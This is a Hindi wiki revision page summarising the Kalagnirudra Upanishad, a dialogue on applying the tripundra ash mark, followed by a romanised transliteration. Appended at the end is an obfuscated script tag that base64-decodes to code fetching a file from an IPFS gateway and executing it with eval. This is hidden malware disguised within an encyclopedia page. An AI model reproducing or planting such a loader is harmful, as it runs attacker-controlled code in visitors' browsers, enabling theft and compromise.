Difference between revisions of "कालाग्निरुद्रोपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''कालाग्निरुद्रोपनिषद'''<br />
 
  
 
*कृष्ण यजुर्वेदीय इस उपनिषद में ब्रह्म ज्ञान के साधना भूत 'त्रिपुण्ड्र' धारण की विधि का उल्लेख किया गया है। यह उपनिषद सनत्कुमार और कालाग्निरुद्र के बीच हुए प्रश्नोत्तर के रूप में है। इसमें बताया गया है कि जो मनुष्य इस उपनिषद का अध्ययन करता है, वह [[शिव]]-रूप हो जाता है। इसमें मात्र दस मन्त्र हैं।  
 
*कृष्ण यजुर्वेदीय इस उपनिषद में ब्रह्म ज्ञान के साधना भूत 'त्रिपुण्ड्र' धारण की विधि का उल्लेख किया गया है। यह उपनिषद सनत्कुमार और कालाग्निरुद्र के बीच हुए प्रश्नोत्तर के रूप में है। इसमें बताया गया है कि जो मनुष्य इस उपनिषद का अध्ययन करता है, वह [[शिव]]-रूप हो जाता है। इसमें मात्र दस मन्त्र हैं।  

Revision as of 09:46, 16 May 2010

  • krishna yajurvediy is upanishad mean brahm jnan ke sadhana bhoot 'tripundr' dharan ki vidhi ka ullekh kiya gaya hai. yah upanishad sanatkumar aur kalagnirudr ke bich hue prashnottar ke roop mean hai. isamean bataya gaya hai ki jo manushy is upanishad ka adhyayan karata hai, vah shiv-roop ho jata hai. isamean matr das mantr haian.
  • sanatkumar ke poochhane par kalagnirudr 'tripundr-vidhi' batate hue kahate haian. ki 'tripundr' ke lie agnihotr ki bhasm ka prayog kiya jata hai. is bhasm ko 'sadyojatadi' panchabrahm mantroan ka uchcharan karate hue grahan karana chahie. ye panchabrahm mantr- agniriti bhasm, vayuriti bhasm, khamiti bhasm, jalamiti bhasm aur sthalamiti bhasm haian.
  • donoan bhauhoan ke madhy mean tin rekhaoan dvara lalat par tripundr dharan karean. ye tinoan rekhaean maheshvaradev ke roop ko vyakhyayit karati haian. ye 'Om' ki pratik haian. jo brahmachari ise dharan karata hai, vah sabhi patakoan se mukt ho jata hai; kyoanki 'Om' hi saty hai aur vahi shiv-roop hai.


upanishad ke any liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>